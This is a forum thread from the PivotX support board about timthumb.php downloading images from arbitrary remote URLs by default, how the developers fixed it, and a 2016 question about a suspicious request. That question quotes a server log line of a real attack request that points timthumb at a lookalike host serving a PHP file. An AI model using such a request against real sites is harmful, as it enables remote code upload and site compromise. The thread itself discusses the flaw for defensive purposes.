Page 1 of 1

Security: timthumb.php allows cross-site access by default

PostPosted: Sun May 23, 2010 2:47 pm
by mskala
The file pivotx/includes/timthumb.php , which is used for making thumbnails of images, accepts the URL of the image to thumbnail as a query variable. Although the script includes code to check that the specified URL is local, or on a whitelist of allowed URLs, this code is disabled by default. There's a line that says "$allow_remote_all = true;", and as a result, it will accept any URL the user specifies and attempt to download an image from that URL. This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site); or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library. Downloading remote images this way, if it's ever allowed, certainly shouldn't be allowed by default; and the setting is not user-configurable but hardcoded in the script.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Sun May 23, 2010 5:53 pm
by hansfn
Hi and thanks for posting.

I do understand some of your concerns, and I will discuss it with Bob - who just recently enabled/allowed remote images. Unluckily it's not easy to control this using a PivotX config setting since timthumb.php is standalone.

This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site);

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library.

is a scary and much more likely problem.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Tue May 25, 2010 7:19 pm
by hansfn
FYI: We no longer allow remote images by default - changed in revision 2729.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon Oct 10, 2011 8:21 am
by scoude
hansfn wrote:Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,


Hi,

I just have a hacker using my site with PivotX using this vulnerability ...

[cut by hansfn]

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon Oct 10, 2011 8:38 am
by hansfn
This was fixed in PivotX 2.3.0 - did you upgrade?

If you think a similar bug is present in 2.3.0, contact me directly at hansfn@pivotx.net - never disclose such details openly in the forum. Thx :-)

PS! This is a very old thread and your vulnerability isn't the same as the issue discussed in this thread (even if it's related).

Security: timthumb.php

PostPosted: Fri May 20, 2016 9:04 pm
by winters
according to the host I got a problem with

91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

pivotx 2.3.11

does someone know if this can be correct?

thanks!

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Sun May 22, 2016 8:50 pm
by hansfn
No, the default configuration of timthumb.php does not allow fetching from files from img.youtube.com.dwell.kz, only img.youtube.com (and other trusted hosts - see the $ALLOWED_SITES variable).

So, if your host claims that your timthumb.php misbehaves, you have either not updated the file when updating PivotX (it should say "This is timthumb version 2.8.4 - r200" in the beginning of the file) or you have set ALLOW_ALL_EXTERNAL_SITES to true either in timthumb-config.php or in timthumb.php

NB! The fact that some one tries to attack your timthumb.php doesn't prove or say that there is a vulnerability.

Re: Security: timthumb.php allows cross-site access by defau

PostPosted: Mon May 23, 2016 8:29 pm
by winters
thank you hans